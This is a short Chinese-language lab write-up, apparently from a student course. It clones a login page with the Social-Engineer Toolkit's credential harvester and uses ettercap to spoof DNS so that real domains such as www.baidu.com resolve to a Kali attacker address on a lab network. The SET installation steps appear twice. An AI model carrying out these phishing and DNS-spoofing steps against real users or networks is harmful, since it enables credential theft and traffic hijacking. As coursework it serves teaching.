Antech 2020-05-10
sudo vi /etc/apache2/ports.conf
命令修改Apache的端口文件,将端口改为80,如下图所示:netstat -tupln |grep 80
命令查看80端口是否被占用。如果有,使用kill+进程号
杀死该进程。如下图所示,无其他占用:apachectl start
开启Apache服务:sudo setoolkit
出现bash:setoolkit:未找到命令
系统显示未安装,使用命令进行安装git clone https://github.com/trustedsec/social-engineer-toolkit/ set/``cd set``python setup.py install
setoolkit
进入SET工具1 Social-Engineering Attacks
选择社会工程学攻击2 Website Attack Vectors
即钓鱼网站攻击向量3 Credential Harvester Attack Method
即登录密码截取攻击2 Site Cloner
进行克隆网站ifconfig eth0 promisc
将kali网卡改为混杂模式;vi /etc/ettercap/etter.dns
对DNS缓存表进行修改,如图所示,可以添加网站和IP的DNS记录,我这里加了三个www.besti.edu.cn A 192.168.40.132 www.cnblogs.cn A 192.168.40.132 www.baidu.com A 192.168.40.132
ettercap -G
按图中设置,设置完成后打钩开始嗅探192.168.40.2
靶机地址为192.168.40.141
Plugins—>Manage the plugins
,选择dns_spoof
即DNS欺骗的插件,双击后即可开启ping www.cnblogs.cn
命令结果如下,可以看到其实是给攻击机也就是kali虚拟机发送ping命令sudo setoolkit
出现bash:setoolkit:未找到命令
系统显示未安装,使用命令进行安装git clone https://github.com/trustedsec/social-engineer-toolkit/ set/``cd set``python setup.py install
setoolkit
进入SET工具